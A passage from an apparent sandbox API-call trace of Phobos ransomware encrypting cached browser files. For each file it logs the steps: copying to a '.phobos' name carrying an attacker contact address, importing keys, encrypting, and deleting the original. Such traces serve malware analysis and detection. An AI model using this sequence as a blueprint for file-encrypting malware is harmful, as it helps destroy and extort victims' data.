0xb8 [0185.166] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=343) returned 1 [0185.166] CloseHandle (hObject=0xb8) returned 1 [0185.166] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAmin0Z[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aamin0z[1].png")) returned 0x2020 [0185.166] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAmin0Z[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aamin0z[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAmin0Z[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aamin0z[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.167] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.167] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAmin0Z[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aamin0z[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.167] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0185.167] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.167] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x157, lpOverlapped=0x0) returned 1 [0185.256] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x160, dwBufLen=0x160 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x160) returned 1 [0185.256] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x160, lpOverlapped=0x0) returned 1 [0185.256] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0185.256] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.256] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.256] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.256] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.257] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.257] CloseHandle (hObject=0xb8) returned 1 [0185.257] CloseHandle (hObject=0x130) returned 1 [0185.257] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAmin0Z[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aamin0z[1].png")) returned 1 [0185.259] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0185.259] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ast[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ast[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.260] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=71739) returned 1 [0185.260] CloseHandle (hObject=0x130) returned 1 [0185.260] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ast[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ast[1].js")) returned 0x2020 [0185.260] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ast[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ast[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ast[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ast[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.260] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.260] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ast[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ast[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.261] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0185.261] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.261] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1183b, lpOverlapped=0x0) returned 1 [0185.564] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x11840, dwBufLen=0x11840 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x11840) returned 1 [0185.565] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x11840, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x11840, lpOverlapped=0x0) returned 1 [0185.566] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0185.566] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.566] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.566] CryptDestroyKey (hKey=0xa32de8) returned 1 [0185.566] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.567] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.567] CloseHandle (hObject=0x130) returned 1 [0185.567] CloseHandle (hObject=0xb8) returned 1 [0185.567] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ast[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ast[1].js")) returned 1 [0185.568] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0185.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\autotrack[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\autotrack[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.569] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=5033) returned 1 [0185.569] CloseHandle (hObject=0xb8) returned 1 [0185.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\autotrack[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\autotrack[1].js")) returned 0x2020 [0185.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\autotrack[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\autotrack[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\autotrack[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\autotrack[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.569] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.569] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\autotrack[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\autotrack[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.570] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0185.570] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.570] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x13a9, lpOverlapped=0x0) returned 1 [0185.588] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x13b0, dwBufLen=0x13b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x13b0) returned 1 [0185.588] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x13b0, lpOverlapped=0x0) returned 1 [0185.589] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a68) returned 1 [0185.589] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.589] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.589] CryptDestroyKey (hKey=0xa32a68) returned 1 [0185.589] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.589] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.589] CloseHandle (hObject=0xb8) returned 1 [0185.589] CloseHandle (hObject=0x130) returned 1 [0185.589] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\autotrack[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\autotrack[1].js")) returned 1 [0185.590] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0185.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB5vO0g[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb5vo0g[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.591] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=438) returned 1 [0185.591] CloseHandle (hObject=0x130) returned 1 [0185.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB5vO0g[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb5vo0g[1].png")) returned 0x2020 [0185.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB5vO0g[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb5vo0g[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB5vO0g[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb5vo0g[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.591] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.591] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB5vO0g[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb5vo0g[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.592] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0185.592] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.592] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1b6, lpOverlapped=0x0) returned 1 [0185.607] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1c0, dwBufLen=0x1c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1c0) returned 1 [0185.607] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1c0, lpOverlapped=0x0) returned 1 [0185.608] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0185.608] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.608] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.608] CryptDestroyKey (hKey=0xa328a8) returned 1 [0185.608] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.608] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.608] CloseHandle (hObject=0x130) returned 1 [0185.608] CloseHandle (hObject=0xb8) returned 1 [0185.609] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB5vO0g[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb5vo0g[1].png")) returned 1 [0185.609] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0185.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB8AdqN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb8adqn[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.610] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=342) returned 1 [0185.610] CloseHandle (hObject=0xb8) returned 1 [0185.610] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB8AdqN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb8adqn[1].png")) returned 0x2020 [0185.610] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB8AdqN[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb8adqn[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB8AdqN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb8adqn[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.611] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.611] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB8AdqN[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb8adqn[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.611] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0185.611] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.611] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x156, lpOverlapped=0x0) returned 1 [0185.680] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x160, dwBufLen=0x160 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x160) returned 1 [0185.680] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, 